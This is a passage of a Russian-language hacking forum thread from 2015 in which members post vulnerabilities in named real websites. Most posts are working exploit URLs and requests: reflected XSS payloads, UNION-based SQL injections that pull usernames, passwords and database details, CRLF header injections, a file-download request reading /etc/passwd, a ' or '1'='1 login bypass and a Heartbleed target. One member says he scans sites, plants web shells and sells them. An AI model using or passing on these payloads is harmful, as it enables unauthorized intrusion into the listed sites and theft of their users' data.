Уязвимости SQLi, XSS и другие.

Discussion in 'Песочница' started by Егорыч+++, 10 May 2015.

  1. Filipp

    Filipp Member

    Joined:
    10 May 2015
    Messages:
    246
    Likes Received:
    56
    Reputations:
    31
    XSS-reflected:
    Code:
    http://www.blagaya.ru/?s=1%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Ealert%28document.lastmodified%29%3C/ScRiPt%3E
     
    #121 Filipp, 10 Jul 2015
    Last edited: 10 Jul 2015
  2. frank

    frank Level 8

    Joined:
    8 May 2015
    Messages:
    200
    Likes Received:
    95
    Reputations:
    28
    Сканером что ли каким то шел? или фазил?
     
  3. Filipp

    Filipp Member

    Joined:
    10 May 2015
    Messages:
    246
    Likes Received:
    56
    Reputations:
    31
    Да, сканером) Лень что-то менять, я сразу как что то нахожу сюда сливаю.
     
  4. frank

    frank Level 8

    Joined:
    8 May 2015
    Messages:
    200
    Likes Received:
    95
    Reputations:
    28
    Ну не знаю . Это конечно мое мнение, но в чем профит то? Когда сканер идет по доркам и ищет. Мне кажется опыта и знаний это не даст.
    Кстати, в вашем примере ксс очень условная.
    1. Она есть даже при обычной записи <script>alert(1) </script>
    2. Сработает только на огнелисе без всяких там noscript. Свежие версии ослика и хрома модифицируют запрос встроенной защитой от ксс. И алерта уже не будет.
     
  5. EoGeneo

    EoGeneo Member

    Joined:
    29 Aug 2009
    Messages:
    129
    Likes Received:
    9
    Reputations:
    1
    Да и вообще, какой прикол по РУ работать, давай по USA лучше
     
  6. Filipp

    Filipp Member

    Joined:
    10 May 2015
    Messages:
    246
    Likes Received:
    56
    Reputations:
    31
    Сканер влепил так, я запрос скопировал и запостил. А профит прост как пять пальцев, выбираю сайты, сканю их, в некоторые заливаю шеллы и продаю. А где нет ничего серьезного, там XSS или SQLi от которых толку особо нет я закидываю сюда) Тут они кому то пригодяться да и я репы получу.
    Шеллы покупают, не уверен что кто-то будет брать USA шелл, покрайней мере, надо будет искать покупателя и скорее всего он не надежный. Конечно есть гарант для таких дел, но я все же придерживаюсь классики)
     
    palec2006 likes this.
  7. Filipp

    Filipp Member

    Joined:
    10 May 2015
    Messages:
    246
    Likes Received:
    56
    Reputations:
    31
    XSS-reflected:
    Code:
    http://volia.com/ukr/subscribe/order/?pro=cine_plus_vip%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

    HTTP Parametr Pollution (Original Link):
    Code:
    http://www.moscvettorg.ru/english/collection/vse-bukety/product/otkrytka-vintazhnaya-011%26n950821%3dv972549?TAGS=vse-bukety&CODE=otkrytka-vintazhnaya-011&n950821=v972549
    
    Exploit:
    Code:
    http://www.moscvettorg.ru/english/collection/vse-bukety/product/otkrytka-vintazhnaya-011%26n950821%3dv972549

    CRLF-inj:
    Code:
    POST mh-proxy.ru/blog/action.php
    POST-DATA: id=%0d%0a%20SomeCustomInjectedHeader:injected_by_ANTICHAT
    Code:
    http://guru.ua/
    Cookie: user_set_city=%0D%0A%20SomeCustomInjectedHeader:injected_by_ANTICHAT
    Code:
    POST topclub.ua/
    POST DATA: ACT=45&business=1&comment=1&email=sample%40email.tst&form_name=%d0%97%d0%b0%d1%8f%d0%b2%d0%ba%d0%b0%20%d0%bd%d0%b0%20%d0%bf%d1%80%d0%be%d0%b4%d0%b2%d0%b8%d0%b6%d0%b5%d0%bd%d0%b8%d0%b5%20%d0%b7%d0%b0%d0%b2%d0%b5%d0%b4%d0%b5%d0%bd%d0%b8%d1%8f&name=hsmryamv&params_id=81288&phone=555-666-0606&position=1&redirect_on_duplicate=&RET=http://topclub.ua/pages/business/%26utm_campaign%3dadd_venue_sub_nav%26utm_medium%3dpages_business%26utm_source%3dtopclub_vn&return=%0d%0a%20SomeCustomInjectedHeader:injected_by_ANTICHAT&site_id=1&status=open&submit=%d0%9e%d1%82%d0%bf%d1%80%d0%b0%d0%b2%d0%b8%d1%82%d1%8c%20%d0%b7%d0%b0%d1%8f%d0%b2%d0%ba%d1%83&town=1&URI=pages/business/%26utm_campaign%3dadd_venue_sub_nav%26utm_medium%3dpages_business%26utm_source%3dtopclub_vn&XID=
     
  8. Filipp

    Filipp Member

    Joined:
    10 May 2015
    Messages:
    246
    Likes Received:
    56
    Reputations:
    31
    XSS:
    Code:
    http://lifetosex.com.ua/tags?tags=%25D0%25A1%25D0%25B5%25D0%25BA%25D1%2581%2520-%2520%25D0%259A%25D0%25BB%25D0%25B0%25D1%2581%25D1%2581%25D0%25B8%25D0%25BA%25D0%25B0%3Cvideo%3E%3Csource%20onerror%3d%22javascript:alert%281%29%22%3E&tag_list_start=36
     
    kalam_antichat likes this.
  9. Filipp

    Filipp Member

    Joined:
    10 May 2015
    Messages:
    246
    Likes Received:
    56
    Reputations:
    31
    XSS-reflected:
    Code:
    http://otsos.info/aubox.php?callback=%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28%22For%20Antichat%22%29%3C/ScRiPt%3E&_=1438000881938
    XSS-reflected:
    Code:
    http://kofe-spb.ru/feedback.php?complaint=170%3C/textarea%3E%3CScRiPt%20%3Eprompt%28%22Antichat%22%29%3C/ScRiPt%3E
    XSS-reflected:
    Code:
    http://sexytales.org/stories/drama/?ecid[]=42&necid[]=42&order_by=-part_count%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28%22Antichat%22%29%3C/ScRiPt%3E&period=&per_page=
     
    #129 Filipp, 27 Jul 2015
    Last edited: 28 Jul 2015
  10. ocheretko

    ocheretko Banned

    Joined:
    15 May 2010
    Messages:
    151
    Likes Received:
    51
    Reputations:
    116
    интересная XSS:
    Code:
    http://www.fas.harvard.edu/antichat=%3Cscript%3Ealert%28/antichat/%29;%3C/script%3E%00
     
    Filipp, BigBear and frank like this.
  11. Filipp

    Filipp Member

    Joined:
    10 May 2015
    Messages:
    246
    Likes Received:
    56
    Reputations:
    31
    XSS-reflected:
    Code:
    http://sonnik.orakul.ua/freyd/ch%3Cvideo%3E%3Csource%20onerror%3d%22javascript:prompt%281%29%22%3E/
     
  12. joelblack

    joelblack Reservists Of Antichat

    Joined:
    6 Jul 2015
    Messages:
    228
    Likes Received:
    389
    Reputations:
    105
    target: http://tstu.ru
    type: AFD
    Code:
    http://tstu.ru/video/download_img.php?url=/etc/passwd

    исправил
     
    #132 joelblack, 4 Aug 2015
    Last edited: 5 Aug 2015
  13. blud_niy

    blud_niy New Member

    Joined:
    26 Jul 2015
    Messages:
    8
    Likes Received:
    2
    Reputations:
    0
    SQL-inj (Blind):
    Code:
    http://www.isihac.net/news-article.php?id=-47%27+union+select+1,2,3,4,password,6,7,8+from+users+limit+0,1+--+
     
  14. private_static

    Joined:
    19 May 2015
    Messages:
    118
    Likes Received:
    76
    Reputations:
    22
    XSS
    Code:
    http://www.kadrovik.ru/prc.php?year=2015"><script>alert("xss");</script>
    SQL inject
    Code:
    http://orgpoisk.ru/region/id/-8%20union%20select%201,DATABASE%28%29,CURRENT_USER%28%29,4,5,6,7
    user:huntfishru_orpsk@localhost
    db:huntfishru_orpsk
     
  15. blud_niy

    blud_niy New Member

    Joined:
    26 Jul 2015
    Messages:
    8
    Likes Received:
    2
    Reputations:
    0
    SQL inject
    Code:
    http://www.bookpourghaz.ir/post.php?id=-suHWoFO3ScI_EQUALS_'+union+select+1,2,3,user(),5,6,7,8+--+
    Code:
    http://www.seroqadir.com/read.php?id=-2323'+union+select+1,2,3,user(),5,6+--+
    SQL inject
    Code:
    http://library.phcsuphan.ac.th/webpage.contentread.php?id=-6'+union+select+1,user(),3,4,5+--+
    Code:
    http://www.malnaditimudigere.com/view_post.php?id=-2'+union+select+1,2,3,user(),5,6,7,8,9+--+
    Code:
    http://www.100devok.ru/view_post.php?id=-125'+union+select+1,2,3,4,5,user(),7,8,9,10,11,12,13,14+--+
     
    #135 blud_niy, 7 Aug 2015
    Last edited by a moderator: 7 Aug 2015
    3nvY likes this.
  16. joelblack

    joelblack Reservists Of Antichat

    Joined:
    6 Jul 2015
    Messages:
    228
    Likes Received:
    389
    Reputations:
    105
    yarbabin likes this.
  17. blud_niy

    blud_niy New Member

    Joined:
    26 Jul 2015
    Messages:
    8
    Likes Received:
    2
    Reputations:
    0
    Site: http://www.hungatecottages.co.uk
    Уязвимость: SQL Injection
    Эксплоит:
    Code:
    http://www.hungatecottages.co.uk/blog-post.php?id=-55'+union+select+1,username,3,4,5,password,7,8,9+from+adminusers+limit+0,1+--+
    Site: http://www.brandnmc.com
    Уязвимость: SQL Injection
    Эксплоит:
    Code:
    http://www.brandnmc.com/view-product.php?id=-45'+union+select+1,2,version(),4,5,6,7,8+--+
    Site: http://agrovolyn.com
    Уязвимость: SQL Injection
    Эксплоит:
    Code:
    http://agrovolyn.com/news.php?id=-657'+union+select+1,version(),table_name,4,5,6,user()+from+information_schema.tables+limit+3,1+--+
    Site: http://www.siempreenplay.com
    Уязвимость: SQL Injection
    Эксплоит:
    Code:
    http://www.siempreenplay.com/EstudiosCientificos_post.php?id=-16'+union+select+1,2,3,4,5,table_name,7,8,9,10+from+information_schema.tables+limit+3,1+--+
    Site: http://www.fivestarhomefoods.com
    Уязвимость: SQL Injection
    Эксплоит:
    Code:
    http://www.fivestarhomefoods.com/view_product.php?id=-18'+union+select+1,column_name+from+information_schema.columns+where+table_name=%27users%27+limit+03,1+--+
     
    YaBtr likes this.
  18. joelblack

    joelblack Reservists Of Antichat

    Joined:
    6 Jul 2015
    Messages:
    228
    Likes Received:
    389
    Reputations:
    105
    target: http://www.goravia.ru/
    type: XSS Reflected
    http://www.goravia.ru/authorization/
    POST:
    Code:
    pass=adm&backurl=%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2fscript%3E&member=1&user=adm
    target: https://www.aviba.ru/
    type: XSS Reflected
    https://www.aviba.ru/
    POST:
    Code:
    locate_start=1&tudaobratno=%3E%3Cscript%3Ealert%28%27hello%27%29%3B%3C%2fscript%3E&polet_class=E&f_from=%D0%9E%D1%82%D0%BA%D1%83%D0%B4%D0%B0&f_to=%D0%9A%D1%83%D0%B4%D0%B0&f_date2=%D0%9E%D0%B1%D1%80%D0%B0%D1%82%D0%BD%D0%BE&f_date1=%D0%94%D0%B0%D1%82%D0%B0

     
  19. Filipp

    Filipp Member

    Joined:
    10 May 2015
    Messages:
    246
    Likes Received:
    56
    Reputations:
    31
    Heartbleed:
    Code:
    https://avon-ekb.ru
     
    BigBear and hahanovB like this.
  20. joelblack

    joelblack Reservists Of Antichat

    Joined:
    6 Jul 2015
    Messages:
    228
    Likes Received:
    389
    Reputations:
    105
    target: http://www.tez-tour.com/
    type: XSS Reflected
    Code:
    http://www.tez-tour.com/captcha/index.htm?hotelTypeBetter=1&ref=%22%3E%3Cscript%3Ealert%28%27hello,tez%27%29%3B%3C%2Fscript%3E&regionId=
    target: http://www.pstour.ru
    type: SQL Injection

    Code:
    login:admin  password:' or '1'='1
     
    #140 joelblack, 13 Aug 2015
    Last edited: 13 Aug 2015
    DDShadoww, comstream and MDen1s like this.
Loading...